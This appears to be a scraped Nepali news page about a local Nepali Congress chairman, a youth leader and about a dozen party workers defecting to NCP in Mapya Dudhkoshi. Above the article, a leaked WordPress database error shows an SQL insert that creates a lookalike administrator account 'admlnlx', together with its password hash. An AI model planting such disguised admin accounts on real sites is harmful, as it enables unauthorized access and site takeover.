WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7m4eNZnKtktanfnr4082k8tZ5bAH5.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:55:31', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, माप्य दुधकोशी । तत्कालिन बासा गाउँ विकास समितिका नेपालि काङ्ग्रेस सभापति लोकजित कार्की, युवा नेता गोबिन्द राई लगायत एक दर्जन कार्यकता नेपालि काङ्ग्रेस परित्याग गरि नेकपा प्रबेश गरेका छन् ।
माप्य दुधकोशी गाउँपालिकामा आयोजित एक कार्यक्रममा नव प्रवेशी कार्यकतालाई प्रदेश नंं.१ का मुख्य मन्त्रि एबं नेकपाका नेता शेरधन राई लगायत अन्य उपस्थित नेताले अबिर तथा खादा लगाएर स्वगत गर्नुभयो ।
देशमा संघिता सस्थापन र दिगो बिकास गर्नको लागि नेकपा बाहेक अरु पार्टिले गर्न नसक्ने भएकोले नेकपामा प्रबेश गरेको लोकजित कार्कीले बताए ।

कार्यक्रममा प्रतिनिधि सभा सदस्य मा. हेम कुमार राई “सुरबीर”, नेकपा प्रदेश नंं. १ संसदीय दलका सचेतक मा.बुद्धिकुमार राजभण्डारी, माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धि किरण राई, नेकपा केन्द्रिय सदस्य गोम्बु शेर्पा “कज्र्याङ”, मानबिर राई, ध्रुब पराजुली, राजेन्द्र, नेता बिर कुमार राई लगायता नेताहरुको उपस्तिथि रहेको थियो ।